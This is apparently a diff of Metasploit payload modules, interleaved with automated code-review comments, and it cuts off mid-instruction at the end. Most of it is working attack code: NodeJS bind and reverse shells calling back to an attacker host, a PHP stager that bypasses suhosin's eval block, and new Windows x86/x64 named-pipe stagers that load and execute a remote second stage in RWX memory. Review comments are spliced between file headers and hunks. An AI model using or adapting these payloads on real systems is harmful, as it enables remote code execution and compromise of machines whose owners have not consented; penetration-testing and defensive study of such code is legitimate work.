@@ -41,7 +41,10 @@ class Msf::Payload::Apk application = amanifest.xpath('//application') application_name = application.attribute("name") if application_name - return application_name.to_s + application_str = application_name.to_s + unless application_str == 'android.app.Application' + return application_str + end end activities = amanifest.xpath("//activity|//activity-alias") for activity in activities @@ -221,7 +224,7 @@ class Msf::Payload::Apk FileUtils.rm Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/R*.smali") package = amanifest.xpath("//manifest").first['package'] - package = package + ".#{Rex::Text::rand_text_alpha_lower(5)}" + package = package.downcase + ".#{Rex::Text::rand_text_alpha_lower(5)}" classes = {} classes['Payload'] = Rex::Text::rand_text_alpha_lower(5).capitalize classes['MainService'] = Rex::Text::rand_text_alpha_lower(5).capitalize diff --git a/lib/msf/core/payload/linux/bind_tcp.rb b/lib/msf/core/payload/linux/bind_tcp.rb index cc7fbc7b02..d630bf749e 100644 --- a/lib/msf/core/payload/linux/bind_tcp.rb +++ b/lib/msf/core/payload/linux/bind_tcp.rb @@ -31,7 +31,7 @@ module Payload::Linux::BindTcp # Generate the more advanced stager if we have the space if self.available_space && required_space <= self.available_space - conf[:exitfunk] = datastore['EXITFUNC'], + conf[:exitfunk] = datastore['EXITFUNC'] conf[:reliable] = true end diff --git a/lib/msf/core/payload/nodejs.rb b/lib/msf/core/payload/nodejs.rb index 3ae0de1ab3..1787080721 100644 --- a/lib/msf/core/payload/nodejs.rb +++ b/lib/msf/core/payload/nodejs.rb 
@@ -18,8 +18,13 @@ module Msf::Payload::NodeJS var server = net.createServer(function(socket) { var sh = cp.spawn(cmd, []); socket.pipe(sh.stdin); - util.pump(sh.stdout, socket); - util.pump(sh.stderr, socket); + if (typeof util.pump === "undefined") { + sh.stdout.pipe(client.socket); + sh.stderr.pipe(client.socket); + } else { + util.pump(sh.stdout, client.socket); + util.pump(sh.stderr, client.socket); + } }); server.listen(#{datastore['LPORT']}); })(); @@ -53,8 +58,13 @@ module Msf::Payload::NodeJS var client = this; client.socket = net.connect(#{datastore['LPORT']}, "#{lhost}", #{tls_hash} function() { client.socket.pipe(sh.stdin); - util.pump(sh.stdout, client.socket); - util.pump(sh.stderr, client.socket); + if (typeof util.pump === "undefined") { + sh.stdout.pipe(client.socket); + sh.stderr.pipe(client.socket); + } else { + util.pump(sh.stdout, client.socket); + util.pump(sh.stderr, client.socket); + } }); })(); EOS diff --git a/lib/msf/core/payload/php/bind_tcp.rb b/lib/msf/core/payload/php/bind_tcp.rb index 4756ce810d..7dac6fe441 100644 --- a/lib/msf/core/payload/php/bind_tcp.rb +++ b/lib/msf/core/payload/php/bind_tcp.rb @@ -109,7 +109,15 @@ while (strlen($b) < $len) { # Set up the socket for the main stage to use. $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; -eval($b); +if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) +{ + $suhosin_bypass=create_function('', $b); + $suhosin_bypass(); +} +else +{ + eval($b); +} die();^ end diff --git a/lib/msf/core/payload/php/reverse_tcp.rb b/lib/msf/core/payload/php/reverse_tcp.rb index aa480610c6..5cc7daae8c 100644 --- a/lib/msf/core/payload/php/reverse_tcp.rb +++ b/lib/msf/core/payload/php/reverse_tcp.rb 
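Review bot: In the bind-TCP template, the four new lines reference `client.socket`, but inside `net.createServer(function(socket) { ... })` there is no `client` variable — `var client = this;` only exists in the reverse-TCP template in the second hunk — so the bind payload throws `ReferenceError: client is not defined` on the first connection where the old code used `socket`. Keep the callback's own argument in the first hunk: `sh.stdout.pipe(socket); sh.stderr.pipe(socket);` and `util.pump(sh.stdout, socket); util.pump(sh.stderr, socket);`. The reverse template in the second hunk is correct as written.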
@@ -102,7 +102,15 @@ while (strlen($b) < $len) { # Set up the socket for the main stage to use. $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; -eval($b); +if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) +{ + $suhosin_bypass=create_function('', $b); + $suhosin_bypass(); +} +else +{ + eval($b); +} die();^ end diff --git a/lib/msf/core/payload/stager.rb b/lib/msf/core/payload/stager.rb index 699e884714..1f2ff91aaf 100644 --- a/lib/msf/core/payload/stager.rb +++ b/lib/msf/core/payload/stager.rb @@ -165,8 +165,6 @@ module Msf::Payload::Stager # If the stage should be sent over the client connection that is # established (which is the default), then go ahead and transmit it. if (stage_over_connection?) - opts = {} - if respond_to? :include_send_uuid if include_send_uuid uuid_raw = conn.get_once(16, 1) diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb index 3eb12a7037..c59c85577e 100644 --- a/lib/msf/core/payload/transport_config.rb +++ b/lib/msf/core/payload/transport_config.rb 
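Review bot: The suhosin branch relies on `create_function`, which is deprecated as of PHP 7.2 and removed in PHP 8; that is probably harmless because `suhosin.executor.disable_eval` is a PHP 5-era control, but the branch is chosen solely on `extension_loaded('suhosin')`, so on a newer interpreter with a suhosin build loaded the fallback itself would fatal. Cheap to harden: `if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval') && function_exists('create_function'))`. The identical block is added to `php/bind_tcp.rb` in this commit and should be kept in sync.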
@@ -11,31 +11,35 @@ module Msf::Payload::TransportConfig include Msf::Payload::UUID::Options def transport_config_reverse_tcp(opts={}) + ds = opts[:datastore] || datastore config = transport_config_bind_tcp(opts) - config[:lhost] = datastore['LHOST'] + config[:lhost] = ds['LHOST'] config end def transport_config_reverse_ipv6_tcp(opts={}) + ds = opts[:datastore] || datastore config = transport_config_reverse_tcp(opts) config[:scheme] = 'tcp6' - config[:scope_id] = datastore['SCOPEID'] + config[:scope_id] = ds['SCOPEID'] config end def transport_config_bind_tcp(opts={}) + ds = opts[:datastore] || datastore { scheme: 'tcp', - lhost: datastore['LHOST'], - lport: datastore['LPORT'].to_i - }.merge(timeout_config) + lhost: ds['LHOST'], + lport: ds['LPORT'].to_i + }.merge(timeout_config(opts)) end def transport_config_reverse_https(opts={}) + ds = opts[:datastore] || datastore config = transport_config_reverse_http(opts) - config[:scheme] = datastore['OverrideScheme'] || 'https' - config[:ssl_cert_hash] = get_ssl_cert_hash(datastore['StagerVerifySSLCert'], - datastore['HandlerSSLCert']) + config[:scheme] = ds['OverrideScheme'] || 'https' + config[:ssl_cert_hash] = get_ssl_cert_hash(ds['StagerVerifySSLCert'], + ds['HandlerSSLCert']) config end 
@@ -50,27 +54,38 @@ module Msf::Payload::TransportConfig uri = luri + generate_uri_uuid(sum, opts[:uuid]) end + ds = opts[:datastore] || datastore { - scheme: datastore['OverrideScheme'] || 'http', - lhost: opts[:lhost] || datastore['LHOST'], - lport: (opts[:lport] || datastore['LPORT']).to_i, + scheme: ds['OverrideScheme'] || 'http', + lhost: opts[:lhost] || ds['LHOST'], + lport: (opts[:lport] || ds['LPORT']).to_i, uri: uri, - ua: datastore['MeterpreterUserAgent'], - proxy_host: datastore['PayloadProxyHost'], - proxy_port: datastore['PayloadProxyPort'], - proxy_type: datastore['PayloadProxyType'], - proxy_user: datastore['PayloadProxyUser'], - proxy_pass: datastore['PayloadProxyPass'] - }.merge(timeout_config) + ua: ds['MeterpreterUserAgent'], + proxy_host: ds['PayloadProxyHost'], + proxy_port: ds['PayloadProxyPort'], + proxy_type: ds['PayloadProxyType'], + proxy_user: ds['PayloadProxyUser'], + proxy_pass: ds['PayloadProxyPass'] + }.merge(timeout_config(opts)) + end + + def transport_config_reverse_named_pipe(opts={}) + ds = opts[:datastore] || datastore + { + scheme: 'pipe', + lhost: ds[:pipe_host] || ds['PIPEHOST'], + uri: "/#{ds[:pipe_host] || ds['PIPENAME']}" + }.merge(timeout_config(opts)) end private - def timeout_config + def timeout_config(opts={}) + ds = opts[:datastore] || datastore { - comm_timeout: datastore['SessionCommunicationTimeout'].to_i, - retry_total: datastore['SessionRetryTotal'].to_i, - retry_wait: datastore['SessionRetryWait'].to_i + comm_timeout: (ds[:comm_timeout] || ds['SessionCommunicationTimeout']).to_i, + retry_total: (ds[:retry_total] || ds['SessionRetryTotal']).to_i, + retry_wait: (ds[:retry_wait] || ds['SessionRetryWait']).to_i } end diff --git a/lib/msf/core/payload/windows/bind_tcp.rb b/lib/msf/core/payload/windows/bind_tcp.rb index 63b9a5d651..8945ded6bb 100644 --- a/lib/msf/core/payload/windows/bind_tcp.rb +++ b/lib/msf/core/payload/windows/bind_tcp.rb 
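Review bot: `uri: "/#{ds[:pipe_host] || ds['PIPENAME']}"` reads the symbol key `:pipe_host` for the pipe name, so a symbol-keyed datastore that supplies `:pipe_host` produces a URI of `/<host>` rather than `/<pipe name>` (and the same value already feeds `lhost` on the line above); the `'PIPENAME'` fallback is only reached when `:pipe_host` is absent. This should be `uri: "/#{ds[:pipe_name] || ds['PIPENAME']}"`, mirroring the `lhost`/`'PIPEHOST'` pairing. A short comment on `transport_config_reverse_named_pipe` noting that `opts[:datastore]` may be symbol-keyed (`:pipe_host`, `:pipe_name`, `:comm_timeout`, ...) while the module datastore is string-keyed would make every `||` fallback in this file self-explanatory.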
@@ -35,7 +35,7 @@ module Payload::Windows::BindTcp # Generate the more advanced stager if we have the space if self.available_space && required_space <= self.available_space - conf[:exitfunk] = datastore['EXITFUNC'], + conf[:exitfunk] = datastore['EXITFUNC'] conf[:reliable] = true end diff --git a/lib/msf/core/payload/windows/bind_tcp_rc4.rb b/lib/msf/core/payload/windows/bind_tcp_rc4.rb index d8cdbddb97..37657ddc8a 100644 --- a/lib/msf/core/payload/windows/bind_tcp_rc4.rb +++ b/lib/msf/core/payload/windows/bind_tcp_rc4.rb @@ -33,7 +33,7 @@ module Payload::Windows::BindTcpRc4 # Generate the more advanced stager if we have the space if self.available_space && required_space <= self.available_space - conf[:exitfunk] = datastore['EXITFUNC'], + conf[:exitfunk] = datastore['EXITFUNC'] conf[:reliable] = true end diff --git a/lib/msf/core/payload/windows/meterpreter_loader.rb b/lib/msf/core/payload/windows/meterpreter_loader.rb index 922aa9951d..98824221e3 100644 --- a/lib/msf/core/payload/windows/meterpreter_loader.rb +++ b/lib/msf/core/payload/windows/meterpreter_loader.rb @@ -28,7 +28,7 @@ module Payload::Windows::MeterpreterLoader ], 'Platform' => 'win', 'Arch' => ARCH_X86, - 'PayloadCompat' => { 'Convention' => 'sockedi -https', }, + 'PayloadCompat' => { 'Convention' => 'sockedi handleedi -https', }, 'Stage' => { 'Payload' => "" } )) end @@ -53,9 +53,9 @@ module Payload::Windows::MeterpreterLoader add ebx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])} ^ - unless opts[:stageless] + unless opts[:stageless] || opts[:force_write_handle] == true asm << %Q^ - mov [ebx], edi ; write the current socket to the config + mov [ebx], edi ; write the current socket/handle to the config ^ end 
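Review bot: `unless opts[:stageless] || opts[:force_write_handle] == true` skips the `mov [ebx], edi` store when `force_write_handle` is true, which reads as the opposite of what the name says; if the intent is "the caller has already placed the handle in the config block, do not overwrite it", the option is really a skip flag. Either rename it, e.g. `opts[:skip_write_handle]`, or add a comment above the `unless`: `# :force_write_handle means the config already carries the socket/handle, so do not clobber it with edi` (confirm against the callers, which are not visible here). The enclosing method starts and ends outside this hunk.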
@@ -77,13 +77,14 @@ module Payload::Windows::MeterpreterLoader # create the configuration block, which for staged connections is really simple. config_opts = { - arch: opts[:uuid].arch, - exitfunk: ds['EXITFUNC'], - expiration: ds['SessionExpirationTimeout'].to_i, - uuid: opts[:uuid], - transports: opts[:transport_config] || [transport_config(opts)], - extensions: [], - stageless: opts[:stageless] == true + arch: opts[:uuid].arch, + null_session_guid: opts[:null_session_guid] == true, + exitfunk: ds[:exit_func] || ds['EXITFUNC'], + expiration: (ds[:expiration] || ds['SessionExpirationTimeout']).to_i, + uuid: opts[:uuid], + transports: opts[:transport_config] || [transport_config(opts)], + extensions: [], + stageless: opts[:stageless] == true } # create the configuration instance based off the parameters diff --git a/lib/msf/core/payload/windows/migrate.rb b/lib/msf/core/payload/windows/migrate.rb index f9b924780e..ca94445209 100644 --- a/lib/msf/core/payload/windows/migrate.rb +++ b/lib/msf/core/payload/windows/migrate.rb @@ -3,3 +3,4 @@ require 'msf/core/payload/windows/block_api' require 'msf/core/payload/windows/migrate_tcp' require 'msf/core/payload/windows/migrate_http' +require 'msf/core/payload/windows/migrate_named_pipe' diff --git a/lib/msf/core/payload/windows/migrate_named_pipe.rb b/lib/msf/core/payload/windows/migrate_named_pipe.rb new file mode 100644 index 0000000000..46344e106d --- /dev/null +++ b/lib/msf/core/payload/windows/migrate_named_pipe.rb 
@@ -0,0 +1,47 @@ +# -*- coding: binary -*- + +require 'msf/core' +require 'msf/core/payload/windows/migrate_common' + +module Msf + +### +# +# Payload that supports migrating over Named Pipe transports on x86. +# +### + +module Payload::Windows::MigrateNamedPipe + + include Msf::Payload::Windows::MigrateCommon + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Migrate over Named Pipe transport', + 'Description' => 'Migration stub to use over Named Pipe transports', + 'Author' => ['OJ Reeves'], + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + )) + end + + # + # Constructs the payload + # + def generate_migrate(opts = {}) + %Q^ + start_migrate_pipe: + mov edi, [esi+16] ; The duplicated pipe handle is in the migrate context. + signal_pipe_event: + push dword [esi] ; Event handle is pointed at by esi + push #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')} + call ebp ; SetEvent(handle) + call_pipe_payload: + call dword [esi+8] ; call the associated payload + ^ + end + +end + +end diff --git a/lib/msf/core/payload/windows/reverse_named_pipe.rb b/lib/msf/core/payload/windows/reverse_named_pipe.rb new file mode 100644 index 0000000000..1049b96519 --- /dev/null +++ b/lib/msf/core/payload/windows/reverse_named_pipe.rb 
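Review bot: `generate_migrate(opts = {})` never reads `opts`, and the layout of the migrate context that `esi` points at (event handle at `[esi]`, payload address at `[esi+8]`, duplicated pipe handle at `[esi+16]`) is stated only in the per-instruction asm comments. Since these offsets must agree with whatever builds that context, the method comment should name the contract, e.g. `# Expects esi -> migrate context: [esi] event handle, [esi+8] payload entry, [esi+16] duplicated pipe handle` (presumably the structure is defined alongside MigrateCommon — confirm). If `opts` exists only to match the signature of the other migrate stubs, name it `_opts` so the intent is explicit. The x64 migrate_named_pipe.rb added in this commit has the same two points.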
@@ -0,0 +1,287 @@ +# -*- coding: binary -*- + +require 'msf/core' +require 'msf/core/payload/transport_config' +require 'msf/core/payload/windows/send_uuid' +require 'msf/core/payload/windows/block_api' +require 'msf/core/payload/windows/exitfunk' + +module Msf + +### +# +# Complex reverse_named_pipe payload generation for Windows ARCH_X86 +# +### + +module Payload::Windows::ReverseNamedPipe + + include Msf::Payload::TransportConfig + include Msf::Payload::Windows + include Msf::Payload::Windows::SendUUID + include Msf::Payload::Windows::BlockApi + include Msf::Payload::Windows::Exitfunk + + # + # Register reverse_named_pipe specific options + # + def initialize(*args) + super + end + + # + # Generate the first stage + # + def generate + conf = { + name: datastore['PIPENAME'], + host: datastore['PIPEHOST'] || '.', + retry_count: datastore['ReverseConnectRetries'], + reliable: false + } + + # Generate the advanced stager if we have space + unless self.available_space.nil? || required_space > self.available_space + conf[:exitfunk] = datastore['EXITFUNC'] + conf[:reliable] = true + end + + generate_reverse_named_pipe(conf) + end + + # + # By default, we don't want to send the UUID, but we'll send + # for certain payloads if requested. + # + def include_send_uuid + false + end + + def transport_config(opts={}) + transport_config_reverse_named_pipe(opts) + end + + # + # Generate and compile the stager + # + def generate_reverse_named_pipe(opts={}) + combined_asm = %Q^ + cld ; Clear the direction flag. + call start ; Call start, this pushes the address of 'api_call' onto the stack. 
+ #{asm_block_api} + start: + pop ebp + #{asm_reverse_named_pipe(opts)} + ^ + + #"\xCC" + Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string + Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string + end + + # + # Determine the maximum amount of space required for the features requested + # + def required_space + # Start with our cached default generated size + space = cached_size + + # EXITFUNK 'thread' is the biggest by far, adds 29 bytes. + space += 29 + + # Reliability adds some bytes! + space += 44 + + space += uuid_required_size if include_send_uuid + + # The final estimated size + space + end + + # + # Generate an assembly stub with the configured feature set and options. + # + # @option opts [Fixnum] :port The port to connect to + # @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh + # @option opts [Bool] :reliable Whether or not to enable error handling code + # + def asm_reverse_named_pipe(opts={}) + + retry_count = [opts[:retry_count].to_i, 1].max + reliable = opts[:reliable] + # we have to double-escape because of metasm + full_pipe_name = "\\\\\\\\#{opts[:host]}\\\\pipe\\\\#{opts[:name]}" + + asm = %Q^ + ; Input: EBP must be the address of 'api_call'. 
+ ; Output: EDI will be the handle for the pipe to the server + + retry_start: + push #{retry_count} ; retry counter + mov esi, esp ; keep track of where the variables are + + try_reverse_named_pipe: + ; Start by setting up the call to CreateFile + xor ebx, ebx ; EBX will be used for pushing zero + push ebx ; hTemplateFile + push ebx ; dwFlagsAndAttributes + push 3 ; dwCreationDisposition (OPEN_EXISTING) + push ebx ; lpSecurityAttributes + push ebx ; dwShareMode + push 0xC0000000 ; dwDesiredAccess (GENERIC_READ|GENERIC_WRITE) + call get_pipe_name + db "#{full_pipe_name}", 0x00 + get_pipe_name: + ; lpFileName (via call) + push #{Rex::Text.block_api_hash('kernel32.dll', 'CreateFileA')} + call ebp ; CreateFileA(...) + + ; If eax is -1, then we had a failure. + cmp eax, -1 ; -1 means a failure + jnz connected + + handle_connect_failure: + ; decrement our attempt count and try again + dec [esi] + jnz try_reverse_named_pipe + ^ + + if opts[:exitfunk] + asm << %Q^ + failure: + call exitfunk + ^ + else + asm << %Q^ + failure: + push 0x56A2B5F0 ; hardcoded to exitprocess for size + call ebp + ^ + end + + asm << %Q^ + ; this label is required so that reconnect attempts include + ; the UUID stuff if required. + connected: + xchg edi, eax ; edi now has the file handle we'll need in future + ^ + + asm << asm_write_uuid if include_send_uuid + + asm << %Q^ + ; Receive the size of the incoming second stage... + push ebx ; buffer for lpNumberOfBytesRead + mov ecx, esp + push ebx ; buffer for lpBuffer + mov esi, esp + push ebx ; lpOverlapped + push ecx ; lpNumberOfBytesRead + push 4 ; nNumberOfBytesToRead = sizeof( DWORD ); + push esi ; lpBuffer + push edi ; hFile + push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')} + call ebp ; ReadFile(...) 
to read the size + ^ + + if reliable + asm << %Q^ + ; reliability: check to see if the file read worked, retry otherwise + ; if it fails + test eax, eax + jz cleanup_file + mov eax, [esi+4] ; check to see if bytes were read + test eax, eax + jz cleanup_file + ^ + end + + asm << %Q^ + ; Alloc a RWX buffer for the second stage + mov esi, [esi] ; dereference the pointer to the second stage length + push 0x40 ; PAGE_EXECUTE_READWRITE + push 0x1000 ; MEM_COMMIT + push esi ; push the newly received second stage length. + push 0 ; NULL as we dont care where the allocation is. + push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); + ; Receive the second stage and execute it... + xchg ebx, eax ; ebx = our new memory address for the new stage + push ebx ; push the address of the new stage so we can return into it + + read_more: + ; prepare the size min(0x10000, esi) + mov ecx, 0x10000 ; stupid named pipe buffer limit + cmp ecx, esi + jle size_is_good + mov ecx, esi + + size_is_good: + ; Invoke a read + push eax ; space for the number of bytes + mov eax, esp ; store the pointer + push 0 ; lpOverlapped + push eax ; lpNumberOfBytesRead + push ecx ; nNumberOfBytesToRead + push ebx ; lpBuffer + push edi ; hFile + push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')} + call ebp ; ReadFile(...) 
to read the data + ^ + + if reliable + asm << %Q^ + ; reliability: check to see if the recv worked, and reconnect + ; if it fails + cmp eax, 0 + jz read_failed + pop eax ; get the number of bytes read + cmp eax, 0 + jnz read_successful + + read_failed: + ; something failed, free up memory + pop eax ; get the address of the payload + push 0x4000 ; dwFreeType (MEM_DECOMMIT) + push 0 ; dwSize + push eax ; lpAddress + push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')} + call ebp ; VirtualFree(payload, 0, MEM_DECOMMIT) + + cleanup_file: + ; clear up the named pipe handle + push edi ; named pipe handle + push #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')} + call ebp ; CloseHandle(...) + + ; restore the stack back to the connection retry count + pop esi + pop esi + pop esi + dec [esp] ; decrement the counter + + ; try again + jmp try_reverse_named_pipe + ^ + else + asm << %Q^ + pop eax ; pop bytes read + ^ + end + + asm << %Q^ + read_successful: + add ebx, eax ; buffer += bytes_received + sub esi, eax ; length -= bytes_received, will set flags + jnz read_more ; continue if we have more to read + ret ; return into the second stage + ^ + + if opts[:exitfunk] + asm << asm_exitfunk(opts) + end + + asm + end + +end + +end diff --git a/lib/msf/core/payload/windows/x64/bind_tcp.rb b/lib/msf/core/payload/windows/x64/bind_tcp.rb index 46f7c0b744..f55de65339 100644 --- a/lib/msf/core/payload/windows/x64/bind_tcp.rb +++ b/lib/msf/core/payload/windows/x64/bind_tcp.rb @@ -33,7 +33,7 @@ module Payload::Windows::BindTcp_x64 # Generate the more advanced stager if we have the space if self.available_space && required_space <= self.available_space - conf[:exitfunk] = datastore['EXITFUNC'], + conf[:exitfunk] = datastore['EXITFUNC'] conf[:reliable] = true end diff --git a/lib/msf/core/payload/windows/x64/meterpreter_loader.rb b/lib/msf/core/payload/windows/x64/meterpreter_loader.rb index ce70242b53..257e2cc79c 100644 
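Review bot: `asm_reverse_named_pipe` interpolates `opts[:host]` and `opts[:name]` straight into the assembler source as `db "#{full_pipe_name}", 0x00`, so a PIPENAME or PIPEHOST containing a double quote or another character metasm treats specially yields an assembly error or an altered string instead of a clear option error; validate the two options where `generate` reads them (or escape them before building `full_pipe_name`) and note the constraint in a comment. The `@option opts [Fixnum] :port The port to connect to` line in the method's YARD block is carried over from the TCP stager and documents an option this method never reads; it should list `:name`, `:host` and `:retry_count` instead. The commented-out `#"\xCC" + Metasm::Shellcode.assemble(...)` line in `generate_reverse_named_pipe` is leftover debugging and should be removed. The x64 reverse_named_pipe.rb added in this commit shares the first two issues.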
--- a/lib/msf/core/payload/windows/x64/meterpreter_loader.rb +++ b/lib/msf/core/payload/windows/x64/meterpreter_loader.rb @@ -29,7 +29,7 @@ module Payload::Windows::MeterpreterLoader_x64 ], 'Platform' => 'win', 'Arch' => ARCH_X64, - 'PayloadCompat' => { 'Convention' => 'sockrdi' }, + 'PayloadCompat' => { 'Convention' => 'sockrdi handlerdi -https' }, 'Stage' => { 'Payload' => "" } )) end @@ -42,22 +42,23 @@ module Payload::Windows::MeterpreterLoader_x64 push rbp ; save rbp mov rbp, rsp ; set up a new stack frame sub rsp, 32 ; allocate some space for calls. + and rsp, ~0xF ; Ensure RSP is 16 byte aligned ; GetPC call $+5 ; relative call to get location pop rbx ; pop return value ; Invoke ReflectiveLoader() ; add the offset to ReflectiveLoader() - add rbx, #{"0x%.8x" % (opts[:rdi_offset] - 0x11)} + add rbx, #{"0x%.8x" % (opts[:rdi_offset] - 0x15)} call rbx ; invoke ReflectiveLoader() ; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr) ; offset from ReflectiveLoader() to the end of the DLL add rbx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])} ^ - unless opts[:stageless] + unless opts[:stageless] || opts[:force_write_handle] == true asm << %Q^ - ; store the comms socket handle - mov dword ptr [rbx], edi + ; store the comms socket or handle + mov [rbx], rdi ^ end 
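Review bot: The `add rbx, #{"0x%.8x" % (opts[:rdi_offset] - 0x15)}` adjustment moves from 0x11 to 0x15 in the same hunk that inserts `and rsp, ~0xF` ahead of the GetPC `call $+5`, so the constant appears to be the encoded byte distance from the stub start to the `pop rbx` landing point and must be kept in step with any instruction added above it; nothing records that coupling. A comment on the line would stop the next edit from silently breaking the offset, e.g. `; 0x15 = encoded size of the instructions from the stub start to the pop rbx above; update if anything is inserted before the GetPC call` (inferred from the two changes moving together — confirm against the encoding). The enclosing method starts and ends outside the hunk.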
@@ -79,13 +80,14 @@ module Payload::Windows::MeterpreterLoader_x64 # create the configuration block, which for staged connections is really simple. config_opts = { - arch: opts[:uuid].arch, - exitfunk: ds['EXITFUNC'], - expiration: ds['SessionExpirationTimeout'].to_i, - uuid: opts[:uuid], - transports: opts[:transport_config] || [transport_config(opts)], - extensions: [], - stageless: opts[:stageless] == true + arch: opts[:uuid].arch, + null_session_guid: opts[:null_session_guid] == true, + exitfunk: ds[:exit_func] || ds['EXITFUNC'], + expiration: (ds[:expiration] || ds['SessionExpirationTimeout']).to_i, + uuid: opts[:uuid], + transports: opts[:transport_config] || [transport_config(opts)], + extensions: [], + stageless: opts[:stageless] == true } # create the configuration instance based off the parameters diff --git a/lib/msf/core/payload/windows/x64/migrate.rb b/lib/msf/core/payload/windows/x64/migrate.rb index 20fad5bb2d..770147cc58 100644 --- a/lib/msf/core/payload/windows/x64/migrate.rb +++ b/lib/msf/core/payload/windows/x64/migrate.rb @@ -3,3 +3,4 @@ require 'msf/core/payload/windows/x64/block_api' require 'msf/core/payload/windows/x64/migrate_tcp' require 'msf/core/payload/windows/x64/migrate_http' +require 'msf/core/payload/windows/x64/migrate_named_pipe' diff --git a/lib/msf/core/payload/windows/x64/migrate_named_pipe.rb b/lib/msf/core/payload/windows/x64/migrate_named_pipe.rb new file mode 100644 index 0000000000..193090f5fc --- /dev/null +++ b/lib/msf/core/payload/windows/x64/migrate_named_pipe.rb 
@@ -0,0 +1,47 @@ +# -*- coding: binary -*- + +require 'msf/core' +require 'msf/core/payload/windows/migrate_common' + +module Msf + +### +# +# Payload that supports migrating over Named Pipe transports on x64. +# +### + +module Payload::Windows::MigrateNamedPipe_x64 + + include Msf::Payload::Windows::MigrateCommon_x64 + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Migrate over Named Pipe transport (x64)', + 'Description' => 'Migration stub to use over Named Pipe transports (x64)', + 'Author' => ['OJ Reeves'], + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X64, + )) + end + + # + # Constructs the payload + # + def generate_migrate(opts = {}) + %Q^ + start_migrate_pipe: + mov rdi, qword [rsi+16] ; The duplicated pipe handle is in the migrate context. + signal_pipe_event: + mov rcx, qword [rsi] ; Event handle is pointed at by rsi + mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'SetEvent')} + call rbp ; SetEvent(handle) + call_pipe_payload: + call qword [rsi+8] ; call the associated payload + ^ + end + +end + +end diff --git a/lib/msf/core/payload/windows/x64/reverse_named_pipe.rb b/lib/msf/core/payload/windows/x64/reverse_named_pipe.rb new file mode 100644 index 0000000000..b04ba63f75 --- /dev/null +++ b/lib/msf/core/payload/windows/x64/reverse_named_pipe.rb 
@@ -0,0 +1,283 @@ +# -*- coding: binary -*- + +require 'msf/core' +require 'msf/core/payload/transport_config' +require 'msf/core/payload/windows/x64/send_uuid' +require 'msf/core/payload/windows/x64/block_api' +require 'msf/core/payload/windows/x64/exitfunk' + +module Msf + +### +# +# Complex reverse_named_pipe payload generation for Windows ARCH_X86_64 +# ### + +module Payload::Windows::ReverseNamedPipe_x64 + + include Msf::Payload::TransportConfig + include Msf::Payload::Windows + include Msf::Payload::Windows::SendUUID_x64 + include Msf::Payload::Windows::BlockApi_x64 + include Msf::Payload::Windows::Exitfunk_x64 + + # + # Register reverse_named_pipe specific options + # + def initialize(*args) + super + end + + # + # Generate the first stage + # + def generate + conf = { + name: datastore['PIPENAME'], + host: datastore['PIPEHOST'], + retry_count: datastore['ReverseConnectRetries'], + reliable: false + } + + # Generate the advanced stager if we have space + unless self.available_space.nil? || required_space > self.available_space + conf[:exitfunk] = datastore['EXITFUNC'] + conf[:reliable] = true + end + + generate_reverse_named_pipe(conf) + end + + # + # By default, we don't want to send the UUID, but we'll send + # for certain payloads if requested. + # + def include_send_uuid + false + end + + # + # Generate and compile the stager + # + def generate_reverse_named_pipe(opts={}) + combined_asm = %Q^ + cld ; Clear the direction flag. + and rsp, ~0xF ; Ensure RSP is 16 byte aligned + call start ; Call start, this pushes the address of 'api_call' onto the stack. 
+ #{asm_block_api} + start: + pop rbp ; block API pointer + #{asm_reverse_named_pipe(opts)} + ^ + Metasm::Shellcode.assemble(Metasm::X64.new, combined_asm).encode_string + end + + def transport_config(opts={}) + transport_config_reverse_named_pipe(opts) + end + + # + # Determine the maximum amount of space required for the features requested + # + def required_space + # Start with our cached default generated size + space = cached_size + + # EXITFUNK 'seh' is the worst case, that adds 15 bytes + space += 15 + + # Reliability adds bytes! + space += 57 + + space += uuid_required_size if include_send_uuid + + # The final estimated size + space + end + + # + # Generate an assembly stub with the configured feature set and options. + # + # @option opts [Fixnum] :port The port to connect to + # @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh + # @option opts [Bool] :reliable Whether or not to enable error handling code + # + def asm_reverse_named_pipe(opts={}) + + #reliable = opts[:reliable] + reliable = false + retry_count = [opts[:retry_count].to_i, 1].max + full_pipe_name = "\\\\\\\\#{opts[:host]}\\\\pipe\\\\#{opts[:name]}" + + asm = %Q^ + ; Input: RBP must be the address of 'api_call' + ; Output: RDI will be the handle to the named pipe. + + retry_start: + push #{retry_count} ; retry counter + pop r14 + + ; Func(rcx, rdx, r8, r9, stack ...) + try_reverse_named_pipe: + call get_pipe_name + db "#{full_pipe_name}", 0x00 + get_pipe_name: + pop rcx ; lpFileName + ; Start by setting up the call to CreateFile + push 0 ; alignment + push 0 ; hTemplateFile + push 0 ; dwFlagsAndAttributes + push 3 ; dwCreationDisposition (OPEN_EXISTING) + xor r9, r9 ; lpSecurityAttributes + xor r8, r8 ; dwShareMode + mov rdx, 0xC0000000 ; dwDesiredAccess(GENERIC_READ|GENERIC_WRITE) + mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 